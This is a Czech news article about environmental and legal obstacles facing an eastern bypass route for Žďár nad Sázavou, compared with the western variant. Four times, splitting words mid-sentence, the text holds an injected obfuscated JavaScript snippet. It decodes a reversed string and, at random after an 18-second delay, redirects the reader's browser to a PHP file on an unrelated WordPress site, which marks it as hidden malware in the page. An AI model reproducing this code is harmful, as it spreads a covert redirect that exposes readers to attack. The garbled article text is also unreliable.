Rainbow page separator

Stávající zákony východní variantě obchvatu Žďáru nepřejí

Čtvrtek, 15. června 2023

Žďár nad Sázavou / Na překážky spojené s ochranou přírody poukázal výsledek vyhledávací studie východní varianty obchvatu města. Podle Agentury ochrany přírody a krajiny (AOPK) ČR a Správy Chráněné krajinné oblasti (CHKO) Žďárské vrchy by obchvat vedený východním směrem ve větší míře volnou krajinou představoval ve srovnání se západní varian$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou zanesenou v územním plánu výraznější zásah do ekosystému a krajinného rázu. 

V některých částech by navíc narazil na stávající legislativu. Východní část obchvatu mimo jiné prochází II. zónou ochrany v údolí Stržského po$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toka, což je oblast související s evropsky významnou lokali$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou Louky u Černého lesa u Konventského rybníka. Legislativně sporný by byl rovněž zásah do I. zóny ochrany v oblasti po$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toka Staviště. Problém představuje i průchod obchvatu ochranným pásmem poutního kostela svatého Jana Nepomuckého na Zelené hoře – památky na seznamu UNESCO, kde se je třeba vyhnout všem prvkům narušujícím krajinu a její ráz. Avšak do ochranného pásma památky zasahuje i Ředitelstvím silnic a dálnic (ŘSD) ČR rozpracovaná západní varianta obchvatu a sporný je v ní také průchod trasy v blízkosti evropsky významné lokality Dívka.

Předběžné náklady na východní variantu obchvatu Žďáru se odhadují na zhruba 1,6 miliardy korun, co by mělo být srovnatelné se západní. Technicko-ekonomická studie západní varianty, s níž pracuje ŘSD, však byla provedena již před nějakým časem a dokud nebude aktualizována, což by mělo být v prvním čtvrtletí příštího roku, nelze provést jednoznačné srovnání finanční nákladnosti obou tras.